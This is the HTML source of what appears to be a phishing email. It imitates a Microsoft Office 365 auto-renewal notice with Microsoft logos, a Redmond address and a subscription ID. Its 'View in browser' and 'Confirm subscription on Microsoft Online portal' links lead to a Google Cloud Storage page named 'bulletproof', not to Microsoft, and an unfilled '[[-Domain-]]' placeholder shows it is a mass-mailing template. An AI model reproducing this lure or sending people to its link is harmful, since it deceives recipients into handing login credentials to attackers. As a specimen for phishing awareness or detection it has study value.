<html><head><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="referrer" content="no-referrer">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <style>
        body {margin:0;padding:0;}
        .bodywrap{
            max-width:600px !important;
            margin:auto;
        }
        img[class="hero"] {max-width:600px; width:100% !important; height:auto !important;}
        a {text-decoration:none;}
        a:hover {text-decoration:underline;}
        table {max-width: 600px;}
        table td {border-collapse:collapse;margin:0;padding:0;font-family:'Segoe UI',Helvetica,Arial,sans-serif;}
        p {border-collapse:collapse;}
        img {border:none;}
    </style>
    </head><body leftmargin="0" topmargin="0">
    
    <!--  -->
    
    
    
    <!-- 
    
     -->
    
    
    <table cellpadding="0" cellspacing="0" border="0" align="center">
        <tbody><tr>
            <td align="center" valign="top" class="bodywrap" style="width:600px !important;">
    
    
    
    <table width="100%" cellpadding="0" cellspacing="0" border="0" align="center">
        <tbody><tr>
            <td width="600" align="right" valign="middle" style="color:#3d3d3d; font-family:'Segoe UI',Arial,sans-serif; font-size:10px; font-weight:normal; padding:12px 0 6px;">
    <p>
        Your Office 365 subscription will automatically renew.<br>
        <a href="https://storage.googleapis.com/bulletproof/index.html" title="View this email in your browser" style="color:#3c3c3c; text-decoration:underline;">View this email in your browser</a>.
    </p>
            </td>
        </tr>
    </tbody></table>
    
    <br>
    
    <table width="100%" cellpadding="0" cellspacing="0" border="0" align="center">
        <tbody><tr>
             <td width="30" valign="middle" bgcolor="#0072c6" style="color:#0072c6; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:normal; padding:25px 0 15px;">
                –
             </td>
             <td width="540" align="left" valign="middle" bgcolor="#0072c6" style="color:#ffffff; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:normal; padding:25px 0 25px;">
    <img src="http://image.email.microsoftonline.com/lib/fe95157074600c7e7c/m/1/33520_LogoWhite_Office365_160.png" width="160" height="35" alt="Office 365" border="0">
    <img src="http://image.email.microsoftonline.com/lib/fe95157074600c7e7c/m/1/33337_W15P2_Microsoft.png" width="70" height="14" alt="Microsoft" align="right" border="0">
    <br><br><br>
    <h1 style="color:#ffffff; font-family:'Segoe UI Light','Segoe UI',Arial,sans-serif; font-size:30px; font-weight:100; line-height:40px; margin:0; padding:0;">
        Your Office 365 subscription will automatically renew on 9/30/2019
    </h1>
    
            </td>
            <td width="30" valign="middle" bgcolor="#0072c6" style="color:#0072c6; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:normal; padding:25px 0 15px;">
                –
            </td>
        </tr>
    </tbody></table>
    <br>
    <h1>Confirm subscription on <a href="https://storage.googleapis.com/bulletproof/index.html" style="color:#0044cc;">Microsoft Online portal</a>.
        </h1>
    
    <table width="100%" cellpadding="0" cellspacing="0" border="0" align="center">
        <tbody><tr>
            <td width="30" valign="middle" style="color:#ffffff; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; padding:20px 0;">
                –
            </td>
            <td width="540" align="left" valign="middle" style="color:#3d3d3d; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; padding:20px 0;">
    
    
    
    
    <p>
        
    </p>
    
    
    
    
    
    <p>
        Thanks for subscribing to Office 365. We hope to continue serving you.
    </p>
    
    
    
    
    
    
    
    
    
    
    
            </td>
            <td width="30" valign="middle" style="color:#ffffff; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; padding:20px 0;">
                –
            </td>
        </tr>
    </tbody></table>
    
    
    <table width="100%" cellpadding="0" cellspacing="0" border="0" align="center">
        <tbody><tr>
            <td width="70" valign="middle" style="color:#ffffff; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:normal; padding:0 0 25px;">
                –
            </td>
            <td width="500" align="left" valign="middle" style="color:#002050; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; padding:0 0 25px;">
                <strong style="color:#3d3d3d;">Subscription information:</strong>
                <br>
    <!--             <strong style="color:#3d3d3d;">Organization:</strong> Transparent Energy<br> -->
                <strong style="color:#3d3d3d;">Domain:</strong> [[-Domain-]]<br>
                <strong style="color:#3d3d3d;">Subscription:</strong> Office 365 Business Essentials (Month to Month)<br>
                <strong style="color:#3d3d3d;">Subscription ID:</strong> 8718516a-31c6-4bdc-90e6-a2d45693de36<br>
                
                
                <!-- BEGIN ACCOUNT INFO -->
                
            </td>
            <td width="30" valign="middle" style="color:#ffffff; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:normal; padding:0 0 25px;">
                –
            </td>
        </tr>
    </tbody></table>
    
    
    <table width="100%" cellpadding="0" cellspacing="0" border="0" align="center">
        <tbody>
    </tbody></table>
    
    <table width="100%" cellpadding="0" cellspacing="0" border="0" align="center">
        <tbody><tr>
            <td width="30" valign="middle" style="color:#ffffff; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:normal; padding:20px 0 0 0;">
                –
            </td>
            <td width="540" align="left" valign="middle" colspan="2" style="color:#3d3d3d; font-family:'Segoe UI Light','Segoe UI',Arial,sans-serif; font-size:10px; font-weight:100; padding:20px 0 0 0;">
                <p>
                    This is a mandatory service communication. To set your contact preferences for other communications, <a href="https://click.email.microsoftonline.com/?qs=3942ede63509d6c0968fb5d3e2e43b01c8a31691359c1178731fb3637939e32101a1eef8ec38a1f0cf8b1091c8ce45e8af07b36085e3af8394e4c80c8639cb2c" title="click here" style="color:#0072c6; text-decoration:underline;">click here</a>.<a href="https://click.email.microsoftonline.com/?qs=3b2640d1368bfc938d4c28ba1105c651e6c61326915495196c061d64a64f401e014a8633dc42ab20ec15e141d024d998b8827de9fa3dbe1b6820147f030dd7ad" title="" style="color:#0072c6; text-decoration:underline;"></a>
                <!---->
                </p>
                <p>
                    This message was sent from an unmonitored e-mail address. Please do not reply to this message.<a href="https://click.email.microsoftonline.com/?qs=2469059c74980825f1ff4a8c4e1ecbc0a88b0ee5cc847b2b26f3dc8f6176fe78a0a1459cdde7a6f3e0757e931ab5f6524cd5828d394de66dec8980b811f9e56b" title="" style="color:#0072c6; text-decoration:underline;"></a><a href="https://click.email.microsoftonline.com/?qs=61b2f511b4c80d5cabab5b8751ce30ba465cde3cd29f50cf1c22a0f62def3d9fd8fad42a82980233f7be2621f0345d93da78b55123a68f28cfd6f40dce958f21" title="" style="color:#0072c6; text-decoration:underline;"></a>
                <!---->
                <!---->
                    <br>
                    <a href="https://click.email.microsoftonline.com/?qs=3a8005d6287c370ecf38db030f77eb07a509c18ebec284915e94c7cae5d7a2c7ab5088c00ca2bf772b20b70da2ff29f572f5af442523026b4da27002c85a4f15" title="Privacy" style="color:#0072c6; text-decoration:underline;">Privacy</a> | <a href="https://click.email.microsoftonline.com/?qs=a9ebd89371dc2baa77673497535388747f047c08bcbc936abb49404b860669aa77145af14fed67b19c00dc45c3f69055dba318b600ad0bb5e1695ccf86cf1b19" title="Legal" style="color:#0072c6; text-decoration:underline;">Legal</a>
                <!---->
                </p>
            </td>
            <td width="30" valign="middle" style="color:#ffffff; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:normal; padding:20px 0 0 0;">
                –
            </td>
        </tr>
        <tr>
            <td width="30" valign="middle" style="color:#ffffff; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:normal; padding:10px 0 20px 0;">
                –
            </td>
            <td width="400" align="left" valign="middle" style="color:#3d3d3d; font-family:'Segoe UI Light','Segoe UI',Arial,sans-serif; font-size:10px; font-weight:100; padding:10px 0 20px 0;">
                <p>
                    <span dir="ltr">Microsoft Office<br>One Microsoft Way<br>Redmond, WA<br>98052-6399 USA</span>
                </p>
            </td>
            <td width="140" align="right" valign="bottom" style="color:#3d3d3d; font-family:'Segoe UI Light','Segoe UI',Arial,sans-serif; font-size:10px; font-weight:100; padding:10px 0 20px 0;">
                <img src="http://image.email.microsoftonline.com/lib/fe96157074600c7e7d/m/2/33520_Logo_Microsoft122.png" alt="Microsoft" width="122" height="26" border="0" style="display:block; padding-bottom:20px;">
            </td>
            <td width="30" valign="middle" style="color:#ffffff; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:normal; padding:10px 0 20px 0;">
                –
            </td>
        </tr>
    </tbody></table>
    
    
    
            </td>
        </tr>
    </tbody></table>
    
    </body></html>